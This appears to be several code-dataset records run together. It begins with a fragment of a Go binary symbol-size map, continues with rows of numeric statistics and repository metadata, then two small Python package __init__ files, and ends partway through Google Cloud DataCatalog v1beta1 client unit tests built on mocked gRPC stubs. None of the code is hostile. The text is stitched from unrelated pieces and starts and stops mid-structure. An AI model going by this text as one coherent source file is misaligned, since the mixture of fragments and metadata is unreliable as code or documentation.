'Old_Hungarian': {'value': 8}, 'Old_Italic': {'value': 8}, 'Old_North_Arabian': {'value': 8}, 'Old_Permic': {'value': 8}, 'Old_Persian': {'value': 8}, 'Old_South_Arabian': {'value': 8}, 'Old_Turkic': {'value': 8}, 'Oriya': {'value': 8}, 'Osage': {'value': 8}, 'Osmanya': {'value': 8}, 'Other_Alphabetic': {'value': 8}, 'Other_Default_Ignorable_Code_Point': {'value': 8}, 'Other_Grapheme_Extend': {'value': 8}, 'Other_ID_Continue': {'value': 8}, 'Other_ID_Start': {'value': 8}, 'Other_Lowercase': {'value': 8}, 'Other_Math': {'value': 8}, 'Other_Uppercase': {'value': 8}, 'P': {'value': 8}, 'Pahawh_Hmong': {'value': 8}, 'Palmyrene': {'value': 8}, 'Pattern_Syntax': {'value': 8}, 'Pattern_White_Space': {'value': 8}, 'Pau_Cin_Hau': {'value': 8}, 'Pc': {'value': 8}, 'Pd': {'value': 8}, 'Pe': {'value': 8}, 'Pf': {'value': 8}, 'Phags_Pa': {'value': 8}, 'Phoenician': {'value': 8}, 'Pi': {'value': 8}, 'Po': {'value': 8}, 'Prepended_Concatenation_Mark': {'value': 8}, 'Properties': {'value': 8}, 'Ps': {'value': 8}, 'Psalter_Pahlavi': {'value': 8}, 'Quotation_Mark': {'value': 8}, 'Radical': {'value': 8}, 'Regional_Indicator': {'value': 8}, 
'Rejang': {'value': 8}, 'Runic': {'value': 8}, 'S': {'value': 8}, 'Samaritan': {'value': 8}, 'Saurashtra': {'value': 8}, 'Sc': {'value': 8}, 'Scripts': {'value': 8}, 'Sentence_Terminal': {'value': 8}, 'Sharada': {'value': 8}, 'Shavian': {'value': 8}, 'Siddham': {'value': 8}, 'SignWriting': {'value': 8}, 'Sinhala': {'value': 8}, 'Sk': {'value': 8}, 'Sm': {'value': 8}, 'So': {'value': 8}, 'Soft_Dotted': {'value': 8}, 'Sora_Sompeng': {'value': 8}, 'Soyombo': {'value': 8}, 'Sundanese': {'value': 8}, 'Syloti_Nagri': {'value': 8}, 'Syriac': {'value': 8}, 'Tagalog': {'value': 8}, 'Tagbanwa': {'value': 8}, 'Tai_Le': {'value': 8}, 'Tai_Tham': {'value': 8}, 'Tai_Viet': {'value': 8}, 'Takri': {'value': 8}, 'Tamil': {'value': 8}, 'Tangut': {'value': 8}, 'Telugu': {'value': 8}, 'Terminal_Punctuation': {'value': 8}, 'Thaana': {'value': 8}, 'Thai': {'value': 8}, 'Tibetan': {'value': 8}, 'Tifinagh': {'value': 8}, 'Tirhuta': {'value': 8}, 'Ugaritic': {'value': 8}, 'Unified_Ideograph': {'value': 8}, 'Vai': {'value': 8}, 'Variation_Selector': {'value': 8}, 'Warang_Citi': {'value': 8}, 'White_Space': {'value': 8}, 'Yi': {'value': 8}, 'Z': {'value': 8}, 'Zanabazar_Square': {'value': 8}, 'Zl': {'value': 8}, 'Zp': {'value': 8}, 'Zs': {'value': 8}, 'foldCommon': {'value': 8}, 'foldGreek': {'value': 8}, 'foldInherited': {'value': 8}, 'foldL': {'value': 8}, 'foldLl': {'value': 8}, 'foldLt': {'value': 8}, 'foldLu': {'value': 8}, 'foldM': {'value': 8}, 'foldMn': {'value': 8}, 'init': {'value': 22912}, 'initdone.': {'value': 1}, 'statictmp_1': {'value': 56}, 'statictmp_10': {'value': 56}, 'statictmp_101': {'value': 36}, 'statictmp_102': {'value': 56}, 'statictmp_104': {'value': 12}, 'statictmp_105': {'value': 56}, 'statictmp_106': {'value': 132}, 'statictmp_107': {'value': 420}, 'statictmp_108': {'value': 56}, 'statictmp_109': {'value': 36}, 'statictmp_11': {'value': 672}, 'statictmp_110': {'value': 56}, 'statictmp_112': {'value': 24}, 'statictmp_113': {'value': 56}, 'statictmp_114': {'value': 
12}, 'statictmp_115': {'value': 56}, 'statictmp_116': {'value': 6}, 'statictmp_117': {'value': 12}, 'statictmp_118': {'value': 56}, 'statictmp_12': {'value': 456}, 'statictmp_120': {'value': 24}, 'statictmp_121': {'value': 56}, 'statictmp_122': {'value': 12}, 'statictmp_123': {'value': 56}, 'statictmp_124': {'value': 84}, 'statictmp_125': {'value': 56}, 'statictmp_127': {'value': 48}, 'statictmp_128': {'value': 56}, 'statictmp_129': {'value': 18}, 'statictmp_13': {'value': 56}, 'statictmp_130': {'value': 56}, 'statictmp_132': {'value': 36}, 'statictmp_133': {'value': 56}, 'statictmp_134': {'value': 6}, 'statictmp_135': {'value': 56}, 'statictmp_136': {'value': 12}, 'statictmp_137': {'value': 56}, 'statictmp_138': {'value': 6}, 'statictmp_139': {'value': 56}, 'statictmp_14': {'value': 756}, 'statictmp_140': {'value': 12}, 'statictmp_141': {'value': 56}, 'statictmp_143': {'value': 12}, 'statictmp_144': {'value': 56}, 'statictmp_146': {'value': 24}, 'statictmp_147': {'value': 56}, 'statictmp_149': {'value': 24}, 'statictmp_15': {'value': 744}, 'statictmp_150': {'value': 56}, 'statictmp_151': {'value': 24}, 'statictmp_152': {'value': 56}, 'statictmp_153': {'value': 18}, 'statictmp_154': {'value': 56}, 'statictmp_155': {'value': 552}, 'statictmp_156': {'value': 864}, 'statictmp_157': {'value': 56}, 'statictmp_158': {'value': 18}, 'statictmp_159': {'value': 56}, 'statictmp_16': {'value': 56}, 'statictmp_161': {'value': 48}, 'statictmp_162': {'value': 56}, 'statictmp_164': {'value': 72}, 'statictmp_165': {'value': 56}, 'statictmp_166': {'value': 48}, 'statictmp_167': {'value': 56}, 'statictmp_169': {'value': 12}, 'statictmp_17': {'value': 30}, 'statictmp_170': {'value': 56}, 'statictmp_171': {'value': 24}, 'statictmp_172': {'value': 56}, 'statictmp_174': {'value': 60}, 'statictmp_175': {'value': 56}, 'statictmp_177': {'value': 12}, 'statictmp_178': {'value': 56}, 'statictmp_180': {'value': 12}, 'statictmp_181': {'value': 56}, 'statictmp_182': {'value': 192}, 
'statictmp_183': {'value': 56}, 'statictmp_184': {'value': 48}, 'statictmp_185': {'value': 56}, 'statictmp_186': {'value': 12}, 'statictmp_187': {'value': 60}, 'statictmp_188': {'value': 56}, 'statictmp_190': {'value': 12}, 'statictmp_191': {'value': 56}, 'statictmp_193': {'value': 180}, 'statictmp_194': {'value': 56}, 'statictmp_195': {'value': 198}, 'statictmp_196': {'value': 36}, 'statictmp_197': {'value': 56}, 'statictmp_198': {'value': 84}, 'statictmp_199': {'value': 56}, 'statictmp_2': {'value': 2154}, 'statictmp_20': {'value': 56}, 'statictmp_200': {'value': 96}, 'statictmp_201': {'value': 56}, 'statictmp_202': {'value': 66}, 'statictmp_203': {'value': 72}, 'statictmp_204': {'value': 56}, 'statictmp_205': {'value': 84}, 'statictmp_206': {'value': 56}, 'statictmp_207': {'value': 6}, 'statictmp_208': {'value': 56}, 'statictmp_21': {'value': 84}, 'statictmp_210': {'value': 36}, 'statictmp_211': {'value': 56}, 'statictmp_212': {'value': 54}, 'statictmp_213': {'value': 56}, 'statictmp_214': {'value': 12}, 'statictmp_215': {'value': 24}, 'statictmp_216': {'value': 56}, 'statictmp_218': {'value': 24}, 'statictmp_219': {'value': 56}, 'statictmp_22': {'value': 84}, 'statictmp_220': {'value': 120}, 'statictmp_221': {'value': 84}, 'statictmp_222': {'value': 56}, 'statictmp_224': {'value': 24}, 'statictmp_225': {'value': 56}, 'statictmp_227': {'value': 24}, 'statictmp_228': {'value': 56}, 'statictmp_229': {'value': 18}, 'statictmp_23': {'value': 56}, 'statictmp_230': {'value': 56}, 'statictmp_232': {'value': 12}, 'statictmp_233': {'value': 56}, 'statictmp_234': {'value': 84}, 'statictmp_235': {'value': 56}, 'statictmp_236': {'value': 42}, 'statictmp_237': {'value': 12}, 'statictmp_238': {'value': 56}, 'statictmp_239': {'value': 12}, 'statictmp_24': {'value': 12}, 'statictmp_240': {'value': 56}, 'statictmp_242': {'value': 96}, 'statictmp_243': {'value': 56}, 'statictmp_244': {'value': 24}, 'statictmp_245': {'value': 56}, 'statictmp_247': {'value': 24}, 'statictmp_248': 
{'value': 56}, 'statictmp_25': {'value': 56}, 'statictmp_250': {'value': 24}, 'statictmp_251': {'value': 56}, 'statictmp_252': {'value': 108}, 'statictmp_253': {'value': 56}, 'statictmp_254': {'value': 186}, 'statictmp_255': {'value': 56}, 'statictmp_256': {'value': 18}, 'statictmp_257': {'value': 56}, 'statictmp_258': {'value': 30}, 'statictmp_259': {'value': 56}, 'statictmp_26': {'value': 66}, 'statictmp_261': {'value': 36}, 'statictmp_262': {'value': 56}, 'statictmp_264': {'value': 84}, 'statictmp_265': {'value': 56}, 'statictmp_266': {'value': 6}, 'statictmp_267': {'value': 56}, 'statictmp_269': {'value': 12}, 'statictmp_27': {'value': 60}, 'statictmp_270': {'value': 56}, 'statictmp_272': {'value': 24}, 'statictmp_273': {'value': 56}, 'statictmp_275': {'value': 12}, 'statictmp_276': {'value': 56}, 'statictmp_277': {'value': 48}, 'statictmp_278': {'value': 56}, 'statictmp_279': {'value': 12}, 'statictmp_28': {'value': 56}, 'statictmp_280': {'value': 56}, 'statictmp_282': {'value': 24}, 'statictmp_283': {'value': 56}, 'statictmp_285': {'value': 36}, 'statictmp_286': {'value': 56}, 'statictmp_288': {'value': 84}, 'statictmp_289': {'value': 56}, 'statictmp_29': {'value': 6}, 'statictmp_290': {'value': 18}, 'statictmp_291': {'value': 56}, 'statictmp_293': {'value': 24}, 'statictmp_294': {'value': 56}, 'statictmp_296': {'value': 36}, 'statictmp_297': {'value': 56}, 'statictmp_299': {'value': 12}, 'statictmp_3': {'value': 2268}, 'statictmp_30': {'value': 24}, 'statictmp_300': {'value': 56}, 'statictmp_302': {'value': 36}, 'statictmp_303': {'value': 56}, 'statictmp_305': {'value': 24}, 'statictmp_306': {'value': 56}, 'statictmp_307': {'value': 36}, 'statictmp_308': {'value': 12}, 'statictmp_309': {'value': 56}, 'statictmp_31': {'value': 56}, 'statictmp_311': {'value': 36}, 'statictmp_312': {'value': 56}, 'statictmp_314': {'value': 60}, 'statictmp_315': {'value': 56}, 'statictmp_316': {'value': 18}, 'statictmp_317': {'value': 56}, 'statictmp_319': {'value': 24}, 
'statictmp_32': {'value': 6}, 'statictmp_320': {'value': 56}, 'statictmp_321': {'value': 24}, 'statictmp_322': {'value': 56}, 'statictmp_324': {'value': 36}, 'statictmp_325': {'value': 56}, 'statictmp_326': {'value': 6}, 'statictmp_327': {'value': 56}, 'statictmp_329': {'value': 24}, 'statictmp_33': {'value': 56}, 'statictmp_330': {'value': 56}, 'statictmp_331': {'value': 6}, 'statictmp_332': {'value': 56}, 'statictmp_333': {'value': 6}, 'statictmp_334': {'value': 56}, 'statictmp_336': {'value': 36}, 'statictmp_337': {'value': 56}, 'statictmp_339': {'value': 24}, 'statictmp_34': {'value': 702}, 'statictmp_340': {'value': 56}, 'statictmp_342': {'value': 12}, 'statictmp_343': {'value': 56}, 'statictmp_345': {'value': 12}, 'statictmp_346': {'value': 56}, 'statictmp_348': {'value': 24}, 'statictmp_349': {'value': 56}, 'statictmp_35': {'value': 396}, 'statictmp_351': {'value': 12}, 'statictmp_352': {'value': 56}, 'statictmp_354': {'value': 12}, 'statictmp_355': {'value': 56}, 'statictmp_356': {'value': 84}, 'statictmp_357': {'value': 56}, 'statictmp_359': {'value': 24}, 'statictmp_36': {'value': 56}, 'statictmp_360': {'value': 56}, 'statictmp_362': {'value': 24}, 'statictmp_363': {'value': 56}, 'statictmp_365': {'value': 60}, 'statictmp_366': {'value': 56}, 'statictmp_368': {'value': 12}, 'statictmp_369': {'value': 56}, 'statictmp_37': {'value': 240}, 'statictmp_371': {'value': 12}, 'statictmp_372': {'value': 56}, 'statictmp_373': {'value': 6}, 'statictmp_374': {'value': 56}, 'statictmp_376': {'value': 24}, 'statictmp_377': {'value': 56}, 'statictmp_379': {'value': 36}, 'statictmp_38': {'value': 48}, 'statictmp_380': {'value': 56}, 'statictmp_381': {'value': 12}, 'statictmp_382': {'value': 56}, 'statictmp_383': {'value': 12}, 'statictmp_384': {'value': 56}, 'statictmp_385': {'value': 12}, 'statictmp_386': {'value': 56}, 'statictmp_387': {'value': 12}, 'statictmp_388': {'value': 56}, 'statictmp_39': {'value': 56}, 'statictmp_390': {'value': 24}, 'statictmp_391': 
{'value': 56}, 'statictmp_393': {'value': 12}, 'statictmp_394': {'value': 56}, 'statictmp_396': {'value': 24}, 'statictmp_397': {'value': 56}, 'statictmp_399': {'value': 36}, 'statictmp_4': {'value': 56}, 'statictmp_40': {'value': 1692}, 'statictmp_400': {'value': 56}, 'statictmp_401': {'value': 72}, 'statictmp_402': {'value': 12}, 'statictmp_403': {'value': 56}, 'statictmp_405': {'value': 24}, 'statictmp_406': {'value': 56}, 'statictmp_408': {'value': 36}, 'statictmp_409': {'value': 56}, 'statictmp_41': {'value': 1800}, 'statictmp_410': {'value': 12}, 'statictmp_411': {'value': 56}, 'statictmp_412': {'value': 6}, 'statictmp_413': {'value': 56}, 'statictmp_414': {'value': 24}, 'statictmp_415': {'value': 56}, 'statictmp_416': {'value': 12}, 'statictmp_417': {'value': 56}, 'statictmp_418': {'value': 18}, 'statictmp_419': {'value': 56}, 'statictmp_42': {'value': 56}, 'statictmp_420': {'value': 12}, 'statictmp_421': {'value': 56}, 'statictmp_422': {'value': 30}, 'statictmp_423': {'value': 56}, 'statictmp_424': {'value': 12}, 'statictmp_425': {'value': 56}, 'statictmp_427': {'value': 24}, 'statictmp_428': {'value': 56}, 'statictmp_429': {'value': 96}, 'statictmp_43': {'value': 42}, 'statictmp_430': {'value': 56}, 'statictmp_432': {'value': 36}, 'statictmp_433': {'value': 56}, 'statictmp_434': {'value': 78}, 'statictmp_435': {'value': 56}, 'statictmp_436': {'value': 6}, 'statictmp_437': {'value': 56}, 'statictmp_438': {'value': 12}, 'statictmp_439': {'value': 56}, 'statictmp_44': {'value': 56}, 'statictmp_440': {'value': 42}, 'statictmp_441': {'value': 56}, 'statictmp_442': {'value': 18}, 'statictmp_443': {'value': 56}, 'statictmp_445': {'value': 24}, 'statictmp_446': {'value': 56}, 'statictmp_448': {'value': 24}, 'statictmp_449': {'value': 56}, 'statictmp_45': {'value': 618}, 'statictmp_450': {'value': 6}, 'statictmp_451': {'value': 56}, 'statictmp_453': {'value': 24}, 'statictmp_454': {'value': 56}, 'statictmp_455': {'value': 12}, 'statictmp_456': {'value': 56}, 
'statictmp_458': {'value': 12}, 'statictmp_459': {'value': 56}, 'statictmp_46': {'value': 420}, 'statictmp_460': {'value': 18}, 'statictmp_461': {'value': 56}, 'statictmp_462': {'value': 24}, 'statictmp_463': {'value': 56}, 'statictmp_464': {'value': 126}, 'statictmp_465': {'value': 56}, 'statictmp_466': {'value': 42}, 'statictmp_467': {'value': 12}, 'statictmp_468': {'value': 56}, 'statictmp_469': {'value': 738}, 'statictmp_47': {'value': 56}, 'statictmp_470': {'value': 432}, 'statictmp_471': {'value': 56}, 'statictmp_472': {'value': 138}, 'statictmp_473': {'value': 72}, 'statictmp_474': {'value': 56}, 'statictmp_475': {'value': 36}, 'statictmp_476': {'value': 56}, 'statictmp_477': {'value': 60}, 'statictmp_478': {'value': 56}, 'statictmp_479': {'value': 12}, 'statictmp_48': {'value': 582}, 'statictmp_480': {'value': 56}, 'statictmp_481': {'value': 6}, 'statictmp_482': {'value': 56}, 'statictmp_483': {'value': 42}, 'statictmp_484': {'value': 108}, 'statictmp_485': {'value': 56}, 'statictmp_486': {'value': 6}, 'statictmp_487': {'value': 56}, 'statictmp_488': {'value': 42}, 'statictmp_489': {'value': 56}, 'statictmp_49': {'value': 516}, 'statictmp_490': {'value': 12}, 'statictmp_491': {'value': 192}, 'statictmp_492': {'value': 56}, 'statictmp_493': {'value': 882}, 'statictmp_494': {'value': 708}, 'statictmp_495': {'value': 56}, 'statictmp_496': {'value': 42}, 'statictmp_497': {'value': 48}, 'statictmp_498': {'value': 56}, 'statictmp_499': {'value': 90}, 'statictmp_5': {'value': 1068}, 'statictmp_50': {'value': 56}, 'statictmp_500': {'value': 96}, 'statictmp_501': {'value': 56}, 'statictmp_502': {'value': 24}, 'statictmp_503': {'value': 56}, 'statictmp_504': {'value': 24}, 'statictmp_505': {'value': 56}, 'statictmp_506': {'value': 120}, 'statictmp_507': {'value': 56}, 'statictmp_508': {'value': 420}, 'statictmp_509': {'value': 768}, 'statictmp_51': {'value': 30}, 'statictmp_510': {'value': 56}, 'statictmp_511': {'value': 12}, 'statictmp_512': {'value': 36}, 
'statictmp_513': {'value': 56}, 'statictmp_514': {'value': 168}, 'statictmp_515': {'value': 56}, 'statictmp_516': {'value': 30}, 'statictmp_517': {'value': 56}, 'statictmp_518': {'value': 24}, 'statictmp_519': {'value': 12}, 'statictmp_52': {'value': 56}, 'statictmp_520': {'value': 56}, 'statictmp_521': {'value': 78}, 'statictmp_522': {'value': 56}, 'statictmp_523': {'value': 18}, 'statictmp_524': {'value': 56}, 'statictmp_526': {'value': 12}, 'statictmp_527': {'value': 56}, 'statictmp_528': {'value': 264}, 'statictmp_529': {'value': 288}, 'statictmp_53': {'value': 1056}, 'statictmp_530': {'value': 56}, 'statictmp_531': {'value': 108}, 'statictmp_532': {'value': 156}, 'statictmp_533': {'value': 56}, 'statictmp_534': {'value': 378}, 'statictmp_535': {'value': 408}, 'statictmp_536': {'value': 56}, 'statictmp_537': {'value': 54}, 'statictmp_538': {'value': 60}, 'statictmp_539': {'value': 56}, 'statictmp_54': {'value': 1092}, 'statictmp_540': {'value': 12}, 'statictmp_541': {'value': 12}, 'statictmp_542': {'value': 56}, 'statictmp_543': {'value': 60}, 'statictmp_546': {'value': 56}, 'statictmp_547': {'value': 6}, 'statictmp_548': {'value': 56}, 'statictmp_549': {'value': 612}, 'statictmp_55': {'value': 56}, 'statictmp_550': {'value': 60}, 'statictmp_551': {'value': 56}, 'statictmp_552': {'value': 54}, 'statictmp_553': {'value': 56}, 'statictmp_554': {'value': 612}, 'statictmp_555': {'value': 60}, 'statictmp_556': {'value': 56}, 'statictmp_557': {'value': 12}, 'statictmp_558': {'value': 56}, 'statictmp_559': {'value': 12}, 'statictmp_56': {'value': 222}, 'statictmp_560': {'value': 56}, 'statictmp_561': {'value': 6}, 'statictmp_562': {'value': 56}, 'statictmp_563': {'value': 6}, 'statictmp_564': {'value': 56}, 'statictmp_565': {'value': 12}, 'statictmp_57': {'value': 216}, 'statictmp_58': {'value': 56}, 'statictmp_59': {'value': 42}, 'statictmp_6': {'value': 924}, 'statictmp_60': {'value': 48}, 'statictmp_61': {'value': 56}, 'statictmp_62': {'value': 168}, 
'statictmp_63': {'value': 372}, 'statictmp_64': {'value': 56}, 'statictmp_65': {'value': 30}, 'statictmp_66': {'value': 56}, 'statictmp_67': {'value': 66}, 'statictmp_68': {'value': 56}, 'statictmp_69': {'value': 132}, 'statictmp_7': {'value': 56}, 'statictmp_70': {'value': 56}, 'statictmp_71': {'value': 30}, 'statictmp_72': {'value': 56}, 'statictmp_73': {'value': 36}, 'statictmp_74': {'value': 56}, 'statictmp_75': {'value': 654}, 'statictmp_76': {'value': 468}, 'statictmp_77': {'value': 56}, 'statictmp_78': {'value': 150}, 'statictmp_79': {'value': 56}, 'statictmp_8': {'value': 396}, 'statictmp_80': {'value': 72}, 'statictmp_81': {'value': 56}, 'statictmp_82': {'value': 138}, 'statictmp_83': {'value': 24}, 'statictmp_84': {'value': 56}, 'statictmp_85': {'value': 258}, 'statictmp_86': {'value': 72}, 'statictmp_87': {'value': 56}, 'statictmp_88': {'value': 600}, 'statictmp_89': {'value': 696}, 'statictmp_9': {'value': 576}, 'statictmp_90': {'value': 56}, 'statictmp_91': {'value': 36}, 'statictmp_92': {'value': 56}, 'statictmp_93': {'value': 6}, 'statictmp_94': {'value': 56}, 'statictmp_95': {'value': 6}, 'statictmp_96': {'value': 56}, 'statictmp_98': {'value': 36}, 'statictmp_99': {'value': 56}}}, 'unicode/': {'children': {'utf8.': {'children': {'DecodeRuneInString': {'value': 532}, 'EncodeRune': {'value': 337}, 'RuneCount': {'value': 316}, 'RuneCountInString': {'value': 316}, 'acceptRanges': {'value': 10}, 'first': {'value': 256}}}}}, 'TYPEDATA': {'value': 23532}}}, 'c/c++ · ': {'children': {'_cgo_callers': {'value': 8}, '_cgo_init': {'value': 8}, '_cgo_mmap': {'value': 8}, '_cgo_munmap': {'value': 8}, '_cgo_notify_runtime_init_done': {'value': 8}, '_cgo_sigaction': {'value': 8}, '_cgo_thread_start': {'value': 8}, '_cgo_yield': {'value': 8}, '_rt0_amd64': {'value': 14}, '_rt0_amd64_linux': {'value': 5}, 'callRet': {'value': 48}, 'cmpbody': {'value': 569}, 'debugCall1024': {'value': 112}, 'debugCall128': {'value': 109}, 'debugCall16384': {'value': 130}, 
'debugCall2048': {'value': 112}, 'debugCall256': {'value': 112}, 'debugCall32': {'value': 73}, 'debugCall32768': {'value': 130}, 'debugCall4096': {'value': 130}, 'debugCall512': {'value': 112}, 'debugCall64': {'value': 73}, 'debugCall65536': {'value': 130}, 'debugCall8192': {'value': 130}, 'debugCallFrameTooLarge': {'value': 20}, 'gosave': {'value': 53}, 'indexbytebody': {'value': 279}, 'masks': {'value': 256}, 'memeqbody': {'value': 318}, 'setg_': {'children': {'gcc': {'value': 10}}}, 'shifts': {'value': 256}, 'VTABLES': {'value': 0}, 'TYPEDATA': {'value': 0}, 'INITIALIZERS': {'value': 0}}}, 'UNKNOWN': {'value': 0}}}
| 45,183
| 90,365
| 0.586592
| 9,886
| 90,366
| 5.272709
| 0.253996
| 0.039366
| 0.067222
| 0.018705
| 0.140237
| 0.116122
| 0.112362
| 0.107259
| 0.104593
| 0.100717
| 0
| 0.110336
| 0.099551
| 90,366
| 1
| 90,366
| 90,366
| 0.530245
| 0
| 0
| 0
| 0
| 0
| 0.520771
| 0.011985
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| true
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
|
0
| 7
|
36f4ef5a4de62e0071b758ef7a05d23ccfc92e5e
| 102
|
py
|
Python
|
ivy_builder/data_loaders/__init__.py
|
ivy-dl/builder
|
a24d7254e90476332b962f9aba9a02222c55e035
|
[
"Apache-2.0"
] | 1
|
2022-02-20T15:40:01.000Z
|
2022-02-20T15:40:01.000Z
|
ivy_builder/data_loaders/__init__.py
|
ivy-dl/builder
|
a24d7254e90476332b962f9aba9a02222c55e035
|
[
"Apache-2.0"
] | null | null | null |
ivy_builder/data_loaders/__init__.py
|
ivy-dl/builder
|
a24d7254e90476332b962f9aba9a02222c55e035
|
[
"Apache-2.0"
] | 1
|
2022-03-29T15:21:56.000Z
|
2022-03-29T15:21:56.000Z
|
from . import specs
from .specs import *
from . import seq_data_loader
from .seq_data_loader import *
| 20.4
| 30
| 0.784314
| 16
| 102
| 4.75
| 0.375
| 0.263158
| 0.342105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 102
| 4
| 31
| 25.5
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7fda9f3992f650c281f2088e7c435c17e7327ae9
| 45
|
py
|
Python
|
oapi/oas/__init__.py
|
davebelais/oapi
|
5d4f6f21529d491496e1991e0d30209ef5e90c49
|
[
"MIT"
] | null | null | null |
oapi/oas/__init__.py
|
davebelais/oapi
|
5d4f6f21529d491496e1991e0d30209ef5e90c49
|
[
"MIT"
] | null | null | null |
oapi/oas/__init__.py
|
davebelais/oapi
|
5d4f6f21529d491496e1991e0d30209ef5e90c49
|
[
"MIT"
] | 1
|
2020-08-27T16:08:56.000Z
|
2020-08-27T16:08:56.000Z
|
from . import model
from . import references
| 15
| 24
| 0.777778
| 6
| 45
| 5.833333
| 0.666667
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 45
| 2
| 25
| 22.5
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3d2bfe59cca788477502a48de0ce5c4243b5f031
| 42,254
|
py
|
Python
|
datacatalog/tests/unit/gapic/v1beta1/test_data_catalog_client_v1beta1.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | null | null | null |
datacatalog/tests/unit/gapic/v1beta1/test_data_catalog_client_v1beta1.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | null | null | null |
datacatalog/tests/unit/gapic/v1beta1/test_data_catalog_client_v1beta1.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import mock
import pytest
from google.cloud import datacatalog_v1beta1
from google.cloud.datacatalog_v1beta1.proto import datacatalog_pb2
from google.cloud.datacatalog_v1beta1.proto import search_pb2
from google.cloud.datacatalog_v1beta1.proto import tags_pb2
from google.iam.v1 import iam_policy_pb2
from google.iam.v1 import policy_pb2
from google.protobuf import empty_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self, method, request_serializer=None, response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestDataCatalogClient(object):
def test_search_catalog(self):
# Setup Expected Response
next_page_token = ""
results_element = {}
results = [results_element]
expected_response = {"next_page_token": next_page_token, "results": results}
expected_response = datacatalog_pb2.SearchCatalogResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
scope = {}
query = "query107944136"
paged_list_response = client.search_catalog(scope, query)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.results[0] == resources[0]
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.SearchCatalogRequest(
scope=scope, query=query
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_search_catalog_exception(self):
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
scope = {}
query = "query107944136"
paged_list_response = client.search_catalog(scope, query)
with pytest.raises(CustomException):
list(paged_list_response)
def test_create_entry_group(self):
# Setup Expected Response
name = "name3373707"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name,
"display_name": display_name,
"description": description,
}
expected_response = datacatalog_pb2.EntryGroup(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
parent = client.location_path("[PROJECT]", "[LOCATION]")
entry_group_id = "entryGroupId-43122680"
entry_group = {}
response = client.create_entry_group(parent, entry_group_id, entry_group)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.CreateEntryGroupRequest(
parent=parent, entry_group_id=entry_group_id, entry_group=entry_group
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_entry_group_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
parent = client.location_path("[PROJECT]", "[LOCATION]")
entry_group_id = "entryGroupId-43122680"
entry_group = {}
with pytest.raises(CustomException):
client.create_entry_group(parent, entry_group_id, entry_group)
def test_get_entry_group(self):
# Setup Expected Response
name_2 = "name2-1052831874"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name_2,
